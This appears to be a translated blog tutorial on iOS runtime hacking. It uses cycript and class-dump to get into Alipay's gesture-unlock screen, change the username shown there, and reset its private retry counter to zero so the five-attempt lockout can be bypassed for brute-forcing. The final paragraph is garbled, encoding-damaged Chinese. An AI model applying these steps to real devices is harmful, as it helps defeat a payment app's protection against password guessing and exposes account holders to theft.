The previous article only introduced how to use the tools; this one puts them into practice, using cycript together with class-dump output to hack an app, with the Alipay app as the sacrifice.
First, the usual routine: get hold of the view controller for the gesture-unlock screen:
cy# var app = [UIApplication sharedApplication]
@"<DFApplication: 0x1666c960>"
cy# var keyWindow = app.keyWindow
@"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x1b047000>; layer = <UIWindowLayer: 0x165d0650>>"
cy# var root = keyWindow.rootViewController
@"<UINavigationController: 0x179779a0>"
cy# var visible = root.visibleViewController
@"<GestureUnlockViewController: 0x165de090>"
Then, referring to the class-dump-z output, let's analyse what GestureUnlockViewController has that is worth exploiting:
@interface GestureUnlockViewController : DTViewController <UIAlertViewDelegate, GestureHeadImageViewDelegate> {
@private
GestureHeadImageView* _headImageView;
GestureTipLabel* _tipLabel;
GestureInputView* _inputView;
DTButton* _forgetButton;
DTButton* _changeAccountButton;
int _retryCount;
UIView* _guideView;
id<GestrueViewControllerDelegate> _delegate;
}
@property(assign, nonatomic) __weak id<GestrueViewControllerDelegate> delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end
At a glance, _tipLabel is the label that shows the account name and the operation hint. As I mentioned in the previous article, @private does not restrict access via keyPath, so let's now modify the username shown on Alipay's login screen:
cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]
[Image: hack-practice.png]
Alipay's gesture-password unlock has a limit on the number of attempts: five consecutive wrong attempts and you have to log in again.
I wanted to remove the retry limit, and found that the counter recording unlock attempts is an int, int _retryCount, which made me rather unhappy, because that means I can't modify its value through KVC.
But that's no problem; I can access it through the pointer:
cy# visible->_retryCount = 0
0
Now I can brute-force the gesture password with a program without any limit. Let's work out how many possibilities there are:
[Image: hack-practice2.png]
That number looks a bit large to me, but for the iPhone 5's CPU it's a piece of cake~
Wait a moment, what is the password's format?
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
id 類(lèi)型的密碼,很?chē)?yán)謹(jǐn),又給 hack 帶來(lái)不少麻煩呀~ 不過(guò)沒(méi)關(guān)系,我們可以利用 Method Swizzling 來(lái)打出 password 到底是什么,不過(guò)呢,貌似可以再寫(xiě)一篇新文章去介紹了……